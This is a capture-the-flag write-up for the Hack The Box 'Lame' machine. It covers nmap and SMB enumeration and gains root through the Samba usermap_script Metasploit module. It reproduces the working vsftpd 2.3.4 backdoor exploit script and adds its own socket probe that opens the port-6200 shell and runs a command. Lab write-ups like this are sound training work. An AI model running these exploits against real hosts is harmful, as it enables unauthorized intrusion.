Lame

#network-enumeration-with-nmap #using-metasploit-framework #introduction-to-networking #getting-started #footprinting #linux-fundamentals

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.


Loot

Users
- root
- makis
- user

Preparation

As with all machines, first I will set up my local environment so that I have somewhere to work from and am ready to attack the lame machine.

First I will create a working directory for this box with an nmap subdirectory, then make it the current working directory.

mkdir -p ~/machines/htb/lame/nmap
cd ~/machines/htb/lame

Next, I will start the machine on HTB, save its IP in a bash variable and connect to the HTB VPN.

export TARGET=10.10.10.3
sudo openvpn ./lab_Rizz0.ovpn

Key Information:

  • Operating System: Linux (Debian/Ubuntu; the "8ubuntu1" suffix in the SSH banner is an Ubuntu package revision)

  • Open Ports: 21, 22, 139, 445

  • Services Running:

    • ftp - vsftpd 2.3.4

    • ssh - OpenSSH 4.7p1 Debian 8ubuntu1

    • smb (139) - netbios-ssn, Samba smbd 3.X - 4.X

    • smb (445) - netbios-ssn, Samba smbd 3.0.20-Debian

Enumeration

Network Enumeration

Nmap - Port Scan

First thing that I will do is run a quick and dirty Nmap scan to find other threads to pull on while a full scan is conducted.

sudo nmap -sS -sC -sV -A ${TARGET} -oA ./nmap/lame_fast -F -v

The above command runs a TCP SYN scan with the default script set and service/version detection (-sS -sC -sV). The -A flag adds OS detection and a traceroute (it also implies -sC and -sV, so those two flags are redundant when -A is given), and the target is the bash variable set during preparation (${TARGET}).

So that we keep records of our findings, output is written in all three formats (normal, grepable and XML) to the nmap subdirectory (-oA ./nmap/lame_fast), and -F limits the scan to the 100 most common ports.

Verbose output (-v) makes Nmap print results as they become available.

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Sun Jun  9 00:37:25 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-06-08T10:51:25-04:00
|_clock-skew: mean: 2h00m19s, deviation: 2h49m43s, median: 18s

The interesting part of the Nmap scan output is shown above.

While I review the output of the quick scan I will set a thorough Nmap scan running. This one covers all 65535 TCP ports (-p-), uses the T4 timing template to speed things up (-T4) and writes all output formats to the nmap subdirectory (-oA ./nmap/lame_full).

sudo nmap -sS -sC -sV -oA ./nmap/lame_full ${TARGET} -p- -T4

The full scan provided no additional information.
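Rather than eyeballing the two reports, the "no additional information" conclusion can be checked mechanically. The script below is an added example, not part of the original write-up: it parses the grepable .gnmap files that -oA produces and reports any open port the full scan found that the fast scan did not. The sample lines are constructed to mirror the scan output above; the extra 8080 entry in the "full" sample is fictitious and exists only so the diff has something to report.

```python
#!/usr/bin/env python3
"""Diff the open-port sets of two Nmap grepable outputs (the .gnmap files -oA writes)."""
import re
import sys
from pathlib import Path

# Each port entry is "port/state/proto/owner/service/rpcinfo/version/" and entries are
# separated by ", ". Split only where the next port number begins, because version
# strings can contain commas themselves.
_ENTRY_SPLIT = re.compile(r",\s+(?=\d+/)")


def parse_gnmap(text):
    """Return {(proto, port): {"service": ..., "version": ...}} for every open port."""
    ports = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        m = re.search(r"\tPorts:\s*(.*?)(?:\t|$)", line)
        if not m:
            continue  # e.g. the "Host: ... Status: Up" line carries no port list
        for entry in _ENTRY_SPLIT.split(m.group(1)):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue  # malformed entry; skip rather than guess
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            if state == "open":
                ports[(proto, int(port))] = {"service": service, "version": version}
    return ports


def new_open_ports(fast_text, full_text):
    """Open ports present in the full scan but absent from the fast scan."""
    fast = parse_gnmap(fast_text)
    return {k: v for k, v in parse_gnmap(full_text).items() if k not in fast}


def diff_files(fast_path, full_path):
    return new_open_ports(Path(fast_path).read_text(), Path(full_path).read_text())


# Constructed sample lines modelled on the scan output above (not the real .gnmap files).
FAST_SAMPLE = (
    "Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)/"
    "\tIgnored State: filtered (96)\n"
)
# Same host with one fictitious extra entry so the diff has something to report.
FULL_SAMPLE = FAST_SAMPLE.replace(
    "\tIgnored State: filtered (96)",
    ", 8080/open/tcp//http-proxy///\tIgnored State: filtered (65530)",
)

if __name__ == "__main__":
    if len(sys.argv) == 3:
        extra = diff_files(sys.argv[1], sys.argv[2])
    else:
        extra = new_open_ports(FAST_SAMPLE, FULL_SAMPLE)
    for (proto, port), info in sorted(extra.items()):
        print(f"{port}/{proto} {info['service']} {info['version']}".rstrip())
    if not extra:
        print("full scan found no open ports beyond the fast scan")
```

Run it as python3 gnmap_diff.py nmap/lame_fast.gnmap nmap/lame_full.gnmap (the script name is my own); with no arguments it runs against the constructed samples. Splitting on "/" is safe because Nmap rewrites any "/" inside a version string as "|" before writing the grepable format.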

The key takeaways from the port scan are that the lame machine:

  • Is running a Linux operating system

  • Has four ports open

    • 21 - FTP

    • 22 - SSH

    • 139, 445 - Samba

Nmap - Vulnerability Scan

Now that we know which services are running, let's run Nmap's vulnerability scripts against them to see whether any known issues are flagged. Failing that, we will manually search searchsploit and Exploit-DB for exploits against each running service version. The script pattern is quoted so the shell does not expand the * globs against files in the working directory.

sudo nmap --script "ftp-vuln*,smb-vuln*" ${TARGET} -oA ./nmap/legacy-vuln

PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

Nmap done: 1 IP address (1 host up) scanned in 200.63 seconds

The automated vulnerability scan provided no extra information with respect to vulnerabilities on the lame host.

Note: there is no ssh-vuln* script family, so SSH gets no coverage from a scan like this. The scripts in the vuln category can be listed with nmap --script-help vuln.

To see all the vulnerability scripts on your installation we can search for .nse files by name and grep the paths. The -name test is what restricts find to .nse files; without it find lists the whole filesystem and grep does all the filtering.

find / -name '*.nse' 2>/dev/null | grep vuln

/usr/share/nmap/scripts/http-vuln-cve2012-1823.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/http-vuln-cve2010-0738.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/http-vuln-cve2009-3960.nse
/usr/share/nmap/scripts/samba-vuln-cve-2012-1182.nse
/usr/share/nmap/scripts/smtp-vuln-cve2010-4344.nse
/usr/share/nmap/scripts/rdp-vuln-ms12-020.nse
/usr/share/nmap/scripts/http-vuln-cve2011-3368.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/http-vuln-cve2015-1635.nse
/usr/share/nmap/scripts/smtp-vuln-cve2011-1764.nse
/usr/share/nmap/scripts/http-vuln-cve2017-8917.nse
/usr/share/nmap/scripts/http-vuln-cve2017-5689.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2126.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/http-vuln-wnr1000-creds.nse
/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
/usr/share/nmap/scripts/smtp-vuln-cve2011-1720.nse
/usr/share/nmap/scripts/smb2-vuln-uptime.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/http-vuln-cve2013-0156.nse
/usr/share/nmap/scripts/http-iis-webdav-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2014-8877.nse
/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse
/usr/share/nmap/scripts/http-vmware-path-vuln.nse
/usr/share/nmap/scripts/vulners.nse
/usr/share/nmap/scripts/http-vuln-cve2011-3192.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2013-7091.nse
/usr/share/nmap/scripts/rsa-vuln-roca.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
/usr/share/nmap/scripts/smb-vuln-webexec.nse
/usr/share/nmap/scripts/http-huawei-hg5xx-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2017-1001000.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2127.nse
/usr/share/nmap/scripts/http-vuln-misfortune-cookie.nse
/usr/share/nmap/scripts/http-vuln-cve2010-2861.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/http-vuln-cve2013-6786.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2128.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2129.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/http-vuln-cve2014-3704.nse
/usr/share/nmap/scripts/rmi-vuln-classloader.nse
/usr/share/nmap/scripts/http-vuln-cve2006-3392.nse
/usr/share/nmap/scripts/http-vuln-cve2015-1427.nse
/usr/share/legion/scripts/nmap/vulners.nse

Protocol Enumeration

FTP - Port 21

First we will manually search for vulnerabilities affecting the version of vsftpd running on the host (vsftpd 2.3.4).

Searchsploit results

Searchsploit shows a backdoor command execution entry for this version, with proof-of-concept code in both Python and Ruby; we will come back and try these during the exploitation phase.

The initial Nmap scan showed that anonymous FTP login is enabled. Logging in anonymously, there were no files to read in the FTP directory and creating files was not permitted.

FTP Secure

SSH - Port 22

At this stage in the penetration test we have no credentials or keys, so there is little to enumerate on SSH beyond its banner.

Looking for public exploits for the version of OpenSSH running on the host (4.7p1) we find multiple potential entries.

SFTP potential vulnerabilities

Samba - Ports 139, 445

Searching searchsploit and Exploit-DB for "smbd" returned nothing usable.

Searching for "Samba" instead returned many entries. From the enumeration phase we know the host runs version 3.0.20-Debian, which narrows them down considerably.

Samba searchsploit results

We notice that there are two public exploits that cover our version of Samba:

Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                  | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)        | unix/remote/16320.rb

Manually enumerating the service we identified the following:

Listing shares with smbclient and no user specified (a null session) we were able to see five shares: print$, tmp, opt, IPC$ and ADMIN$.

smbclient output

Connecting to the tmp share with smbclient as an unauthenticated user succeeds. From there we can list and download files and, more interestingly, upload our own.

File Upload to SMB
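The null-session checks described above can be scripted so every share gets the same treatment. This is an added example wrapped around the smbclient binary, not code from the write-up: it parses the share table printed by smbclient -L, then for each share tries an ls and a zero-byte upload (removed again straight away) to classify it as denied, read-only or writable. It assumes smbclient is on PATH; the marker filename and the sample listing are my own, and the comment column in that sample is made up, only the share names and types come from the enumeration above.

```python
#!/usr/bin/env python3
"""Null-session SMB share enumeration built around smbclient."""
import re
import subprocess
import sys
import tempfile

# One row of the "Sharename  Type  Comment" table printed by `smbclient -L`.
_SHARE_ROW = re.compile(r"^\s+(\S+)\s+(Disk|IPC|Printer)\b\s*(.*)$")


def parse_share_list(text):
    """Return {share: {"type": ..., "comment": ...}} from `smbclient -L` output."""
    shares = {}
    for line in text.splitlines():
        m = _SHARE_ROW.match(line)
        if m:
            shares[m.group(1)] = {"type": m.group(2), "comment": m.group(3).strip()}
    return shares


def classify_access(ls_result, put_result):
    """Turn the (returncode, output) of an 'ls' and a 'put' attempt into an access level."""
    rc, out = ls_result
    if rc != 0 or "NT_STATUS" in out:
        return "denied"
    rc, out = put_result
    if rc != 0 or "NT_STATUS" in out:
        return "read-only"
    return "writable"


def smbclient(args, timeout=30):
    """Run smbclient with a null session (-N) and return (returncode, combined output)."""
    proc = subprocess.run(["smbclient", "-N", *args], capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout + proc.stderr


def enumerate_shares(host, marker="null-session-check.txt"):
    """List shares anonymously and classify each as denied, read-only or writable."""
    _, listing = smbclient(["-L", f"//{host}"])
    results = {}
    # An empty local file is uploaded under a marker name and deleted again: enough
    # to prove write access without leaving anything behind on the share.
    with tempfile.NamedTemporaryFile() as empty:
        for share in parse_share_list(listing):
            unc = f"//{host}/{share}"
            ls = smbclient([unc, "-c", "ls"])
            put = smbclient([unc, "-c", f"put {empty.name} {marker}; del {marker}"])
            results[share] = classify_access(ls, put)
    return results


# Constructed sample of the `smbclient -L` table for the five shares found above;
# the comment column is made up, only the share names and types come from the write-up.
SAMPLE_LISTING = """
\tSharename       Type      Comment
\t---------       ----      -------
\tprint$          Disk      Printer Drivers
\ttmp             Disk      scratch space
\topt             Disk
\tIPC$            IPC       IPC Service (Samba 3.0.20-Debian)
\tADMIN$          IPC       IPC Service (Samba 3.0.20-Debian)

\tServer               Comment
\t---------            -------
"""

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.3"
    for share, access in enumerate_shares(host).items():
        print(f"{share:<10} {access}")
```

Both the return code and the presence of an NT_STATUS_* string are checked because older smbclient builds do not always exit non-zero when a command inside -c fails.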


Exploitation

FTP

The enumeration phase identified two proof-of-concept exploits, one Python script and one Ruby script. Because I am more familiar with Python, we will first mirror that script locally, modify it if required and run it against the lame host.

searchsploit -m 49757.py
Successfully copying exploit to local machine

Reviewing the exploit code we can see that it targets vsftpd 2.3.4 and was tested on Debian, which matches what we think the lame machine is running. The comments mark the lines that may need editing (the FTP port and the banner and prompt strings the script waits for), but the defaults look fine for what we need.

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

# telnetlib is deprecated since Python 3.11 and removed in 3.13; run this with 3.12 or older
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()

python3 ./49757.py 10.10.10.3

This exploit seems to hang, so I tried downloading a different version from a github repository

git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py

This updated version of the exploit also hung, which leads me to believe that the lame host is not vulnerable to this CVE.
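Both scripts above block forever when port 6200 does not answer, so "it hangs" is the only signal they give. The probe below is an added example, not the Exploit-DB script and not code from the write-up: it sends the same ":)" trigger with plain sockets and timeouts, and tells a backdoor port that actively refuses the connection apart from one that silently drops it. The status names, the "probe" username and the default command are my own choices.

```python
#!/usr/bin/env python3
"""Timeout-aware probe for the vsftpd 2.3.4 ':)' backdoor (CVE-2011-2523)."""
import socket
import sys


def _read_line(sock):
    """Read one CRLF-terminated line; return '' on timeout or a closed connection."""
    buf = b""
    try:
        while not buf.endswith(b"\n"):
            chunk = sock.recv(1)
            if not chunk:
                break
            buf += chunk
    except (socket.timeout, TimeoutError):
        pass
    return buf.decode("ascii", "replace").rstrip("\r\n")


def probe_backdoor(host, ftp_port=21, backdoor_port=6200, timeout=5.0, command="id"):
    """Send the ':)' trigger and report what happened on the backdoor port.

    Returns (status, output) where status is one of:
      'not-vsftpd-2.3.4'  banner does not match; nothing was sent
      'shell'             backdoor port accepted; output holds the command result
      'refused'           backdoor port sent RST (nothing listening: not backdoored or patched)
      'timeout'           neither SYN/ACK nor RST within timeout (something is dropping it)
    """
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        banner = _read_line(ctl)
        if "vsFTPd 2.3.4" not in banner:
            return "not-vsftpd-2.3.4", banner
        ctl.sendall(b"USER probe:)\r\n")
        _read_line(ctl)  # usually "331 Please specify the password."; silence is tolerated
        ctl.sendall(b"PASS probe\r\n")
        _read_line(ctl)  # the login itself fails; the listener is already up if the backdoor exists
        # Keep the control connection open while knocking on the backdoor port.
        try:
            shell = socket.create_connection((host, backdoor_port), timeout=timeout)
        except ConnectionRefusedError:
            return "refused", ""
        except (socket.timeout, TimeoutError):
            return "timeout", ""
        with shell:
            shell.settimeout(timeout)
            shell.sendall(command.encode() + b"\n")
            out = b""
            try:
                while True:
                    chunk = shell.recv(4096)
                    if not chunk:
                        break
                    out += chunk
            except (socket.timeout, TimeoutError):
                pass  # the backdoor shell prints no prompt, so silence means the command is done
        return "shell", out.decode("utf-8", "replace").strip()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.3"
    status, output = probe_backdoor(target)
    print(f"[{status}] {output}")
```

The distinction matters when reading a hang: "refused" means nothing is listening on 6200, whereas "timeout" only means the SYN was dropped somewhere between you and the port, which is a different finding from "the backdoor is absent".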

SAMBA

Downloading and reviewing the exploits, it was noted that one is a Metasploit module and the other a proof of concept that attempts to write a string of text to the SMB share, which did not work. Within the Metasploit Ruby file the module is named "Username Map Script":

'Name'           => 'Samba "username map script" Command Execution',

Searching within Metasploit I found the corresponding module, exploit/multi/samba/usermap_script.

After selecting this module I configured the following options and ran it:

set RHOSTS 10.10.10.3
set LHOST tun0
run

root access


Exfiltration

After gaining root access we are dropped into the / directory. The user flag is in /home/makis and the root flag in /root.
